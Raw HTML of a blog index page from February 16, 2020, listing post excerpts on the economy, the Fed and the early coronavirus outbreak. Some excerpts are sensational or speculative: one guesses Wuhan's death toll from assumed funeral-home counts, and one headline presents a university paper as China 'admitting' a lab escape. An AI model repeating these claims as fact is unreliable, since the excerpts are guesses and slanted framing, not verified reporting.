				<span class="posted-on"><a href="https://www.investmentwatchblog.com/negative-interest-rates-are-fatal-ultimately-to-your-banking-system-jeff-gundlach/" title="9:00 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T21:00:09+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/negative-interest-rates-are-fatal-ultimately-to-your-banking-system-jeff-gundlach/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-371.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-371.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-371-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>&nbsp;</p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/banking/" rel="tag">banking</a>, <a href="https://www.investmentwatchblog.com/tag/fatal/" rel="tag">fatal</a>, <a href="https://www.investmentwatchblog.com/tag/interest/" rel="tag">interest</a>, <a href="https://www.investmentwatchblog.com/tag/negative/" rel="tag">negative</a>, <a href="https://www.investmentwatchblog.com/tag/rates/" rel="tag">rates</a>, <a href="https://www.investmentwatchblog.com/tag/system/" rel="tag">system</a>, <a href="https://www.investmentwatchblog.com/tag/ultimately/" rel="tag">ultimately</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975515" class="post-975515 post type-post status-publish format-standard hentry category-all tag-contraction tag-economic tag-fourth tag-going tag-japan tag-reported tag-worst" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/good-news-is-japan-reported-its-fourth-worst-economic-contraction-going-back-to-the-1990s-bad-news-is-that-was-before-the-virus-outbreak/" rel="bookmark">Good news is Japan reported its fourth-worst economic contraction going back to the 1990s.  Bad news is that was before the virus outbreak</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/good-news-is-japan-reported-its-fourth-worst-economic-contraction-going-back-to-the-1990s-bad-news-is-that-was-before-the-virus-outbreak/" title="8:59 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:59:45+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Good news is Japan reported its fourth-worst economic contraction going back to the 1990s Bad news is that was before the virus outbreakt.co/WHkdPOD1US pic.twitter.com/WrdbkqlKSP &mdash; David Ingles (@DavidInglesTV) February 17, &#8230; <a title="Good news is Japan reported its fourth-worst economic contraction going back to the 1990s.  Bad news is that was before the virus outbreak" class="read-more" href="https://www.investmentwatchblog.com/good-news-is-japan-reported-its-fourth-worst-economic-contraction-going-back-to-the-1990s-bad-news-is-that-was-before-the-virus-outbreak/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/contraction/" rel="tag">contraction</a>, <a href="https://www.investmentwatchblog.com/tag/economic/" rel="tag">economic</a>, <a href="https://www.investmentwatchblog.com/tag/fourth/" rel="tag">fourth</a>, <a href="https://www.investmentwatchblog.com/tag/going/" rel="tag">going</a>, <a href="https://www.investmentwatchblog.com/tag/japan/" rel="tag">japan</a>, <a href="https://www.investmentwatchblog.com/tag/reported/" rel="tag">reported</a>, <a href="https://www.investmentwatchblog.com/tag/worst/" rel="tag">worst</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975614" class="post-975614 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-bubble tag-control tag-created tag-longer tag-monster" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/the-fed-has-created-a-monster-bubble-it-can-no-longer-control/" rel="bookmark">The Fed Has Created a Monster Bubble It Can No Longer Control</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/the-fed-has-created-a-monster-bubble-it-can-no-longer-control/" title="8:45 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:45:05+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/the-fed-has-created-a-monster-bubble-it-can-no-longer-control/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/SPX-bubble2-20-400x400.png" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/SPX-bubble2-20-400x400.png 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/SPX-bubble2-20-150x150.png 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by Charles Hugh-Smith The Fed must now accept responsibility for what happens in the end-game of the Moral-Hazard Monster Bubble it created. Contrary to popular opinion, the Federal Reserve didn&#8217;t &#8230; <a title="The Fed Has Created a Monster Bubble It Can No Longer Control" class="read-more" href="https://www.investmentwatchblog.com/the-fed-has-created-a-monster-bubble-it-can-no-longer-control/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bubble/" rel="tag">bubble</a>, <a href="https://www.investmentwatchblog.com/tag/control/" rel="tag">control</a>, <a href="https://www.investmentwatchblog.com/tag/created/" rel="tag">created</a>, <a href="https://www.investmentwatchblog.com/tag/longer/" rel="tag">longer</a>, <a href="https://www.investmentwatchblog.com/tag/monster/" rel="tag">monster</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975611" class="post-975611 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-airbnb tag-airlines tag-coronavirus tag-hotels tag-report tag-slams tag-street" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/the-wolf-street-report-coronavirus-slams-airbnb-airlines-hotels-casinos-san-francisco-other-hot-spots/" rel="bookmark">THE WOLF STREET REPORT: Coronavirus Slams Airbnb, Airlines, Hotels, Casinos, San Francisco, Other Hot Spots</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/the-wolf-street-report-coronavirus-slams-airbnb-airlines-hotels-casinos-san-francisco-other-hot-spots/" title="8:44 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:44:27+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/the-wolf-street-report-coronavirus-slams-airbnb-airlines-hotels-casinos-san-francisco-other-hot-spots/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-370.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-370.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-370-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>It’s not only Chinese tourists, business travelers, and property buyers who’re not showing up, but also travelers from all over the world who’ve gotten second thoughts about sitting on a &#8230; <a title="THE WOLF STREET REPORT: Coronavirus Slams Airbnb, Airlines, Hotels, Casinos, San Francisco, Other Hot Spots" class="read-more" href="https://www.investmentwatchblog.com/the-wolf-street-report-coronavirus-slams-airbnb-airlines-hotels-casinos-san-francisco-other-hot-spots/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/airbnb/" rel="tag">airbnb</a>, <a href="https://www.investmentwatchblog.com/tag/airlines/" rel="tag">airlines</a>, <a href="https://www.investmentwatchblog.com/tag/coronavirus/" rel="tag">coronavirus</a>, <a href="https://www.investmentwatchblog.com/tag/hotels/" rel="tag">hotels</a>, <a href="https://www.investmentwatchblog.com/tag/report/" rel="tag">report</a>, <a href="https://www.investmentwatchblog.com/tag/slams/" rel="tag">slams</a>, <a href="https://www.investmentwatchblog.com/tag/street/" rel="tag">street</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975622" class="post-975622 post type-post status-publish format-standard hentry category-all tag-coming tag-cooks tag-robot tag-vegas tag-waiters" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/robot-waiters-robot-cooks-coming-to-vegas/" rel="bookmark">ROBOT Waiters &#038; ROBOT Cooks Coming to Vegas</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/robot-waiters-robot-cooks-coming-to-vegas/" title="8:19 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:19:04+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Robot waiters are coming to Las Vegas restaurants this year, followed soon after by &#39;robot service fees&#39; pic.twitter.com/rvHZQdRP8u &mdash; Las Vegas Locally 🌴 (@LasVegasLocally) February 16, 2020</p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/coming/" rel="tag">coming</a>, <a href="https://www.investmentwatchblog.com/tag/cooks/" rel="tag">cooks</a>, <a href="https://www.investmentwatchblog.com/tag/robot/" rel="tag">robot</a>, <a href="https://www.investmentwatchblog.com/tag/vegas/" rel="tag">vegas</a>, <a href="https://www.investmentwatchblog.com/tag/waiters/" rel="tag">waiters</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975620" class="post-975620 post type-post status-publish format-standard hentry category-all tag-allowed tag-central tag-people tag-quarantined tag-through" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/quarantined-people-are-allowed-to-walk-through-central-park/" rel="bookmark">Quarantined people are allowed to walk through Central Park</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/quarantined-people-are-allowed-to-walk-through-central-park/" title="8:18 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:18:15+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>&#8220;On his return from China last week, Dr. Ian Lipkin quarantined himself in his basement. His wife now puts his food on the stairs. He’s run out of things to &#8230; <a title="Quarantined people are allowed to walk through Central Park" class="read-more" href="https://www.investmentwatchblog.com/quarantined-people-are-allowed-to-walk-through-central-park/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/allowed/" rel="tag">allowed</a>, <a href="https://www.investmentwatchblog.com/tag/central/" rel="tag">central</a>, <a href="https://www.investmentwatchblog.com/tag/people/" rel="tag">people</a>, <a href="https://www.investmentwatchblog.com/tag/quarantined/" rel="tag">quarantined</a>, <a href="https://www.investmentwatchblog.com/tag/through/" rel="tag">through</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975612" class="post-975612 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-coronavirus tag-death tag-freaking tag-wuhan" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/they-are-freaking-out-real-death-toll-of-coronavirus-in-wuhan/" rel="bookmark">THEY ARE FREAKING OUT! Real death toll of CORONAVIRUS in Wuhan</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/they-are-freaking-out-real-death-toll-of-coronavirus-in-wuhan/" title="8:15 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:15:53+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/they-are-freaking-out-real-death-toll-of-coronavirus-in-wuhan/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-369.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-369.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-369-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>If one funeral home lets say have 100 + dead per day.. how many exist in Wuhan? Lets say min 30 for such big city.. so death tall is around 3000 &#8230; <a title="THEY ARE FREAKING OUT! Real death toll of CORONAVIRUS in Wuhan" class="read-more" href="https://www.investmentwatchblog.com/they-are-freaking-out-real-death-toll-of-coronavirus-in-wuhan/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/coronavirus/" rel="tag">coronavirus</a>, <a href="https://www.investmentwatchblog.com/tag/death/" rel="tag">death</a>, <a href="https://www.investmentwatchblog.com/tag/freaking/" rel="tag">freaking</a>, <a href="https://www.investmentwatchblog.com/tag/wuhan/" rel="tag">wuhan</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975613" class="post-975613 post type-post status-publish format-standard hentry category-all tag-admits tag-china tag-escaped tag-probably tag-virus tag-wuhan" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/china-admits-virus-probably-escaped-from-wuhan-lab/" rel="bookmark">China admits virus &#8220;probably&#8221; escaped from Wuhan lab?</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/china-admits-virus-probably-escaped-from-wuhan-lab/" title="8:11 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T20:11:59+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Beijing-sponsored South China University of Technology concludes that &#8216;the killer coronavirus probably originated from a laboratory in Wuhan&#8217; It points to research on bats and respiratory diseases carried by the animals &#8230; <a title="China admits virus &#8220;probably&#8221; escaped from Wuhan lab?" class="read-more" href="https://www.investmentwatchblog.com/china-admits-virus-probably-escaped-from-wuhan-lab/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/admits/" rel="tag">admits</a>, <a href="https://www.investmentwatchblog.com/tag/china/" rel="tag">china</a>, <a href="https://www.investmentwatchblog.com/tag/escaped/" rel="tag">escaped</a>, <a href="https://www.investmentwatchblog.com/tag/probably/" rel="tag">probably</a>, <a href="https://www.investmentwatchblog.com/tag/virus/" rel="tag">virus</a>, <a href="https://www.investmentwatchblog.com/tag/wuhan/" rel="tag">wuhan</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975578" class="post-975578 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-canada tag-defines tag-extremism tag-right tag-shock tag-truth" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/what-defines-right-wing-extremism-in-canada-the-truth-may-shock-you/" rel="bookmark">What defines Right Wing extremism in Canada? The truth may shock you</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/what-defines-right-wing-extremism-in-canada-the-truth-may-shock-you/" title="2:58 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T14:58:03+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/what-defines-right-wing-extremism-in-canada-the-truth-may-shock-you/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-368.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-368.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-368-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>What defines Right Wing extremism in Canada? The truth may shock you (Links to relevant material below) www.cbc.ca/news/canada/edmonton/right-wing-extremism-1.5441464?fbclid=IwAR0aMTRRbF0pM5J0p9RMjw0ZvqFPdMdcAT9N98dl-nyq4UHPKEmrDtNMW_w www.msn.com/en-ca/news/canada/scope-of-right-wing-extremism-vexed-security-officials-documents-show/ar-BBZl8n0 www.canada.ca/en/security-intelligence-service.html laws-lois.justice.gc.ca/eng/acts/c-23/FullText.html</p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/canada/" rel="tag">canada</a>, <a href="https://www.investmentwatchblog.com/tag/defines/" rel="tag">defines</a>, <a href="https://www.investmentwatchblog.com/tag/extremism/" rel="tag">extremism</a>, <a href="https://www.investmentwatchblog.com/tag/right/" rel="tag">right</a>, <a href="https://www.investmentwatchblog.com/tag/shock/" rel="tag">shock</a>, <a href="https://www.investmentwatchblog.com/tag/truth/" rel="tag">truth</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975573" class="post-975573 post type-post status-publish format-standard has-post-thumbnail hentry category-sticky tag-borrow tag-china tag-edition tag-money tag-shouldn" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/why-you-shouldnt-borrow-too-much-money-china-edition/" rel="bookmark">Why You Shouldn’t Borrow Too Much Money, China Edition</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/why-you-shouldnt-borrow-too-much-money-china-edition/" title="2:55 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T14:55:25+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/why-you-shouldnt-borrow-too-much-money-china-edition/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/China-debt-to-GDP-2020-400x400.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/China-debt-to-GDP-2020-400x400.jpg 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/China-debt-to-GDP-2020-150x150.jpg 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>BY JOHN RUBINO When the US housing bubble burst in 2007, most observers were focused on the threat to Wall Street banks and their massive derivative books. This was a &#8230; <a title="Why You Shouldn’t Borrow Too Much Money, China Edition" class="read-more" href="https://www.investmentwatchblog.com/why-you-shouldnt-borrow-too-much-money-china-edition/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/borrow/" rel="tag">borrow</a>, <a href="https://www.investmentwatchblog.com/tag/china/" rel="tag">china</a>, <a href="https://www.investmentwatchblog.com/tag/edition/" rel="tag">edition</a>, <a href="https://www.investmentwatchblog.com/tag/money/" rel="tag">money</a>, <a href="https://www.investmentwatchblog.com/tag/shouldn/" rel="tag">shouldn</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975572" class="post-975572 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-coronavirus tag-credit tag-perfect tag-storm" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/coronavirus-and-credit-a-perfect-storm/" rel="bookmark">Coronavirus And Credit &#8211; A Perfect Storm</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/coronavirus-and-credit-a-perfect-storm/" title="2:54 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T14:54:58+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/coronavirus-and-credit-a-perfect-storm/">
				<img width="400" height="400" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Sept8-3-400x400.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Sept8-3-400x400.jpg 400w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Sept8-3-150x150.jpg 150w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>Authored by Alasdair Macleod via GoldMoney.com, This article posits that the spread of the coronavirus coincides with the downturn in the global credit cycle, with potentially catastrophic results. At the time of &#8230; <a title="Coronavirus And Credit &#8211; A Perfect Storm" class="read-more" href="https://www.investmentwatchblog.com/coronavirus-and-credit-a-perfect-storm/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/coronavirus/" rel="tag">coronavirus</a>, <a href="https://www.investmentwatchblog.com/tag/credit/" rel="tag">credit</a>, <a href="https://www.investmentwatchblog.com/tag/perfect/" rel="tag">perfect</a>, <a href="https://www.investmentwatchblog.com/tag/storm/" rel="tag">storm</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-975520" class="post-975520 post type-post status-publish format-standard hentry category-all tag-bloomberg tag-employee tag-pregnant tag-reesponse" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/kill-it-bloomberg-in-reesponse-to-pregnant-employee/" rel="bookmark">KILL IT &#8212; Bloomberg &#8230; In reesponse to pregnant employee</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/kill-it-bloomberg-in-reesponse-to-pregnant-employee/" title="2:54 pm" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T14:54:14+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		
			<div class="entry-summary" itemprop="text">
				<p>Employee Allegedly Told Bloomberg She Was Pregnant. She Claims Bloomberg Told Her: ‘Kill It!’ In a lawsuit filed against Bloomberg, in which he settled, the following happened: The Washington Post &#8230; <a title="KILL IT &#8212; Bloomberg &#8230; In reesponse to pregnant employee" class="read-more" href="https://www.investmentwatchblog.com/kill-it-bloomberg-in-reesponse-to-pregnant-employee/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bloomberg/" rel="tag">bloomberg</a>, <a href="https://www.investmentwatchblog.com/tag/employee/" rel="tag">employee</a>, <a href="https://www.investmentwatchblog.com/tag/pregnant/" rel="tag">pregnant</a>, <a href="https://www.investmentwatchblog.com/tag/reesponse/" rel="tag">reesponse</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-974467" class="post-974467 post type-post status-publish format-standard has-post-thumbnail hentry category-all tag-cities tag-coronavirus tag-realize tag-spread tag-subjects tag-worse" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/5-cities-now-cdc-test-subjects-to-see-if-coronavirus-has-spread-worse-than-they-realize/" rel="bookmark">5 Cities Now CDC Test Subjects To See If Coronavirus Has &#8220;Spread Worse Than They Realize!&#8221;</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/5-cities-now-cdc-test-subjects-to-see-if-coronavirus-has-spread-worse-than-they-realize/" title="11:00 am" rel="bookmark"><time class="entry-date published" datetime="2020-02-16T11:00:51+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/5-cities-now-cdc-test-subjects-to-see-if-coronavirus-has-spread-worse-than-they-realize/">
				<img width="400" height="300" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-367.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" srcset="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-367.jpg 480w, https://www.investmentwatchblog.com/wp-content/uploads/2020/02/0-367-300x225.jpg 300w" sizes="(max-width: 400px) 100vw, 400px" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>&nbsp;</p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/cities/" rel="tag">cities</a>, <a href="https://www.investmentwatchblog.com/tag/coronavirus/" rel="tag">coronavirus</a>, <a href="https://www.investmentwatchblog.com/tag/realize/" rel="tag">realize</a>, <a href="https://www.investmentwatchblog.com/tag/spread/" rel="tag">spread</a>, <a href="https://www.investmentwatchblog.com/tag/subjects/" rel="tag">subjects</a>, <a href="https://www.investmentwatchblog.com/tag/worse/" rel="tag">worse</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
<article id="post-974922" class="post-974922 post type-post status-publish format-standard has-post-thumbnail hentry category-sticky tag-bureau tag-contradicting tag-lying tag-reports tag-statics" itemtype='https://schema.org/CreativeWork' itemscope='itemscope'>
	<div class="inside-article">
		
		<header class="entry-header">
			<h2 class="entry-title" itemprop="headline"><a href="https://www.investmentwatchblog.com/what-to-make-of-the-bureau-of-lying-statics-contradicting-jobs-reports/" rel="bookmark">What to Make of the Bureau of Lying Statics’ Contradicting Jobs Reports</a></h2>			<div class="entry-meta">
				<span class="posted-on"><a href="https://www.investmentwatchblog.com/what-to-make-of-the-bureau-of-lying-statics-contradicting-jobs-reports/" title="11:00 am" rel="bookmark"><time class="updated" datetime="2020-02-16T11:00:07+00:00" itemprop="dateModified">February 16, 2020</time><time class="entry-date published" datetime="2020-02-16T11:00:00+00:00" itemprop="datePublished">February 16, 2020</time></a></span>			</div><!-- .entry-meta -->
				</header><!-- .entry-header -->

		<div class="post-image">
			<a href="https://www.investmentwatchblog.com/what-to-make-of-the-bureau-of-lying-statics-contradicting-jobs-reports/">
				<img width="250" height="205" src="https://www.investmentwatchblog.com/wp-content/uploads/2020/02/Give_Dad_Job.jpg" class="attachment-400x400 size-400x400" alt="" itemprop="image" />
			</a>
		</div>
			<div class="entry-summary" itemprop="text">
				<p>by David Haggith Employment has been the one stickler in my recession prediction for 2019, and finding a trustworthy measurement from the government’s statistics is like finding a virgin in a &#8230; <a title="What to Make of the Bureau of Lying Statics’ Contradicting Jobs Reports" class="read-more" href="https://www.investmentwatchblog.com/what-to-make-of-the-bureau-of-lying-statics-contradicting-jobs-reports/">Read more</a></p>
			</div><!-- .entry-summary -->

					<footer class="entry-meta">
				<span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://www.investmentwatchblog.com/tag/bureau/" rel="tag">bureau</a>, <a href="https://www.investmentwatchblog.com/tag/contradicting/" rel="tag">contradicting</a>, <a href="https://www.investmentwatchblog.com/tag/lying/" rel="tag">lying</a>, <a href="https://www.investmentwatchblog.com/tag/reports/" rel="tag">reports</a>, <a href="https://www.investmentwatchblog.com/tag/statics/" rel="tag">statics</a></span>							</footer><!-- .entry-meta -->
			</div><!-- .inside-article -->
</article><!-- #post-## -->
